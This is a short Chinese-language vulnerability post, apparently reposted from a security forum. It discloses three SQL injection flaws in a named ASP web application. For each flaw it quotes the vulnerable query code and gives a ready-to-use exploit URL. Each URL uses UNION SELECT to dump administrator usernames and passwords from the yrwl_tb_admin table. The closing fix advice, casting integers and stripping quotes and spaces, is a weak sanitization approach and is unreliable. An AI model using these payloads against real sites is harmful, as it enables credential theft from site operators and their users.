转自90sec
官方地址:http://www.softatm.com
漏洞证明:/css/ss.txt
程序下载:http://down.chinaz.com/soft/33484.htm
漏洞文件 /userinfo.asp 72行到74行
漏洞类型:字符型注入
漏洞信息:
<p><%yhm = request("yhm")
set rs=server.createobject("adodb.recordset")
exec="select * from yrwl_tb_admin where yhm='"+yhm+"'"
原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。
exp:/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin
----------------------------------------------------------------
漏洞文件 /userinfo.asp 2行到7行
漏洞类型:字符型注入
漏洞信息:
mc = request("ad")
if mc <> "" then
set rs=server.createobject("adodb.recordset")
''定位
sql="select * from yrwl_ad_dhl where cl='1' and mc='" + mc & "'"
原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。
exp:/ad.asp?ad='%20union%20select%201,2,3,4,5,6,7,8,yhm%2bchr(35)%2bpass%20from%20yrwl_tb_admin
----------------------------------------------------------------
漏洞文件 /userinfo.asp 32行,52行
漏洞类型:整数型注入
漏洞信息:
id = request("id")
...
exec="select * from yrwl_tb_lt where id="+id
原因:没有过滤注入语句,直接执行查询
危害:sql注入漏洞,直接爆出用户账号密码。
exp:/bbs_bj.asp?id=11%20and%201=2%20union%20select%201,yhm%2bchr(35)%2bpass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20yrwl_tb_admin
----------------------------------------------------------------
修复方法,整数型过滤字符CInt() 字符型过滤空格和' Replace(str,"'","") Replace(str,"%20","")
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论